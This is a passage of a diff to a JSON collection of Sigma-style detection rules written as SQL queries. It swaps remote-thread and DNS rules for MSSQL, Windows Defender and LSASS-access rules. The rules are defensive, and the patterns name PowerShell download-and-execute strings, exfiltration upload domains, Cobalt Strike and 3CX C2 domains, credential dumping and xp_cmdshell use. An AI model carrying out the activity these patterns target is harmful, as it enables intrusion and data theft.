'\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" ], - "filename": "create_remote_thread_win_susp_remote_thread_source.yml" + "filename": "win_werfault_susp_lsass_credential_dump.yml" }, { - "title": "Accessing WinAPI in PowerShell. Code Injection", - "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", - "status": "test", - "description": "Detects the creation of a remote thread from a Powershell process to another process", - "author": "Nikita Nazarov, oscd.community", + "title": "Restricted Software Access By SRP", + "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "status": "experimental", + "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" ], - "filename": "create_remote_thread_win_powershell_code_injection.yml" + "filename": "win_software_restriction_policies_block.yml" }, { - "title": "CACTUSTORCH Remote Thread Creation", - "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", - "status": "test", - "description": "Detects remote thread creation from CACTUSTORCH as described in references.", - "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "title": "MSSQL XPCmdshell Option Change", + "id": "d08dd86f-681e-4a00-a92c-1db218754417", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.012", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1218.005" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate enable/disable of the setting", + "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_cactustorch.yml" + "filename": "win_mssql_xp_cmdshell_change.yml" }, { - "title": "PowerShell Rundll32 Remote Thread Creation", - "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "title": "MSSQL Add Account To Sysadmin Role", + "id": "08200f85-2678-463e-9c32-88dce2f073d1", "status": "experimental", - "description": "Detects PowerShell remote thread creation in Rundll32.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Rare legitimate administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_powershell_rundll32.yml" + "filename": "win_mssql_add_sysadmin_account.yml" }, { - "title": "Suspicious Scripting in a WMI Consumer", - "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "title": "MSSQL Extended Stored Procedure Backdoor Maggie", + "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", "status": "experimental", - "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", + "author": "Denis Szadkowski, DIRT / DCSO CyTec", "tags": [ - "attack.execution", - "attack.t1059.005" + "attack.persistence", + "attack.t1546" ], "falsepositives": [ - "Legitimate administrative scripts" + "Legitimate extended stored procedures named maggie" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" ], - "filename": "sysmon_wmi_susp_scripting.yml" + "filename": "win_mssql_sp_maggie.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - Sysmon", - "id": "065cceea-77ec-4030-9052-fc0affea7110", + "title": "MSSQL SPProcoption Set", + "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", "status": "experimental", - "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", - "author": "pH-T (Nextron Systems)", + "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.persistence" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Legitimate use of the feature by administrators (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%.anonfiles.com%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_anonymfiles_com.yml" + "filename": "win_mssql_sp_procoption_set.yml" }, { - "title": "DNS HybridConnectionManager Service Bus", - "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", - "status": "test", - "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "MSSQL XPCmdshell Suspicious Execution", + "id": "7f103213-a04e-4d59-8261-213dddf22314", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.execution" ], "falsepositives": [ - "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND NewProcessName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" + "filename": "win_mssql_xp_cmdshell_audit_log.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", - "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", - "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Florian Roth (Nextron Systems)", + "title": "MSSQL Disable Audit Settings", + "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "status": "experimental", + "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" ], - "filename": "dns_query_win_mal_cobaltstrike.yml" + "filename": "win_mssql_disable_audit_settings.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - Sysmon", - "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "title": "MSMQ Corrupted Packet Encountered", + "id": "ae94b10d-fee9-4767-82bb-439b309d5a27", "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "yatinwad and TheDFIRReport", + "description": "Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.execution" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%ufile.io%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSMQ' AND EventID = '2027' AND Level = '2')" ], - "filename": "dns_query_win_ufile_io.yml" + "filename": "win_msmq_corrupted_packet.yml" }, { - "title": "Regsvr32 Network Activity - DNS", - "id": "36e037c4-c228-4866-b6a3-48eb292b9955", - "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Windows Defender Threat Detection Disabled", + "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "status": "stable", + "description": "Detects disabling Windows Defender threat protection", + "author": "Ján Trenčanský, frack113", "tags": [ - "attack.execution", - "attack.t1559.001", "attack.defense_evasion", - "attack.t1218.010" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions (should be investigated)", + "Seen being triggered occasionally during Windows 8 Defender Updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" ], - "filename": "dns_query_win_regsvr32_network_activity.yml" + "filename": "win_defender_disabled.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - DNS", - "id": "bd03a0dc-5d93-49eb-b2e8-2dfd268600f8", - "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PSExec and WMI Process Creations Block", + "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", + "status": "test", + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control" + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName LIKE '%akamaicontainer.com%' ESCAPE '\\' OR QueryName LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR QueryName LIKE '%azuredeploystore.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR QueryName LIKE '%dunamistrd.com%' ESCAPE '\\' OR QueryName LIKE '%glcloudservice.com%' ESCAPE '\\' OR QueryName LIKE '%journalide.org%' ESCAPE '\\' OR QueryName LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR QueryName LIKE '%msedgeupdate.net%' ESCAPE '\\' OR QueryName LIKE '%msstorageazure.com%' ESCAPE '\\' OR QueryName LIKE '%msstorageboxes.com%' ESCAPE '\\' OR QueryName LIKE '%officeaddons.com%' ESCAPE '\\' OR QueryName LIKE '%officestoragebox.com%' ESCAPE '\\' OR QueryName LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR QueryName LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR QueryName LIKE '%pbxsources.com%' ESCAPE '\\' OR QueryName LIKE '%qwepoi123098.com%' ESCAPE '\\' OR QueryName LIKE '%sbmsa.wiki%' ESCAPE '\\' OR QueryName LIKE '%sourceslabs.com%' ESCAPE '\\' OR QueryName LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR QueryName LIKE '%zacharryblogs.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" ], - "filename": "dns_query_win_malware_3cx_compromise.yml" + "filename": "win_defender_psexec_wmi_asr.yml" }, { - "title": "DNS Query for MEGA.io Upload Domain - Sysmon", - "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", - "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "title": "LSASS Access Detected via Attack Surface Reduction", + "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", + "status": "experimental", + "description": "Detects Access to LSASS Process", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "dns_query_win_mega_nz.yml" + "filename": "win_defender_alert_lsass_access.yml" }, { - "title": "DNS Query Tor Onion Address - Sysmon", - "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "title": "Win Defender Restored Quarantine File", + "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "status": "experimental", - "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", - "author": "frack113", + "description": "Detects the restoration of files from the defender quarantine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrator activity restoring a file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%.onion%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" ], - "filename": "dns_query_win_tor_onion.yml" + "filename": "win_defender_restored_quarantine_file.yml" }, { - "title": "Potential SocGholish Second Stage C2 DNS Query", - "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", - "status": "experimental", - "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", - "author": "Dusty Miller", + "title": "Windows Defender Threat Detected", + "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "status": "stable", + "description": "Detects all actions taken by Windows Defender malware detection engines", + "author": "Ján Trenčanský", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" ], - "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" + "filename": "win_defender_threat.yml" }, { - "title": "Hacktool Download", - "id": "19b041f6-e583-40dc-b842-d6fa8011493f", - "status": "experimental", - "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender AMSI Trigger Detected", + "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "status": "stable", + "description": "Detects triggering of AMSI by Windows Defender.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE 